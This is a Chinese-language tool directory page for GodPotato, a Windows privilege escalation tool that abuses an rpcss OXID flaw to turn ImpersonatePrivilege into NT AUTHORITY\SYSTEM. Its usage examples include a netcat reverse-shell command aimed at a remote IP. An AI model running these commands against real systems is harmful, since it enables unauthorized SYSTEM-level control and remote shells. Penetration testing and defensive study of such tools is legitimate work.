Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
GodPotato — 基于DCOM的权限提升工具,适用于Windows Server 2012-2022和Windows 8-11,通过rpcss oxid漏洞将具有ImpersonatePrivilege的用户提升至NT AUTHORITY\SYSTEM。 | Kitploit
工具/GitHubGitHub/beichendream/godpotato
权限提升漏洞利用后渗透利用渗透测试
GitHubbeichendream/godpotato

GodPotato

基于DCOM的权限提升工具,适用于Windows Server 2012-2022和Windows 8-11,通过rpcss oxid漏洞将具有ImpersonatePrivilege的用户提升至NT AUTHORITY\SYSTEM。

查看仓库
2.3k273292年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GodPotato

基于6年来土豆提权的发展历史,从最初的RottenPotato到最后的JuicyPotatoNG,我通过研究DCOM发现了一项新技术,能够在Windows Server 2012至Windows 2022系统上实现提权。现在,只要你拥有"ImpersonatePrivilege"权限,你就是"NT AUTHORITY\SYSTEM"。通常情况下,WEB服务和数据库服务拥有"ImpersonatePrivilege"权限。

土豆提权通常在我们获取WEB/数据库权限时使用。我们可以将低权限的服务用户提升为"NT AUTHORITY\SYSTEM"权限。 然而,历史上的土豆系列无法在最新的Windows系统上运行。在研究DCOM时,我找到了一种新的提权方法。rpcss在处理oxid时存在缺陷,而rpcss是系统必须开启的服务,因此该方法几乎可以在所有Windows操作系统上运行。我将其命名为GodPotato。

受影响版本

Windows Server 2012 - Windows Server 2022
Windows 8 - Windows 11

示例

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF


参数:

        -cmd 必需:True 命令行 (默认 cmd /c whoami)

示例:

GodPotato -cmd "cmd /c whoami"


使用程序内置的Clsid进行提权,并执行一个简单命令

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

自定义Clsid并执行命令

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

执行反向shell命令

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

感谢

zcgonvh

skay

许可证

Apache License 2.0

下载工具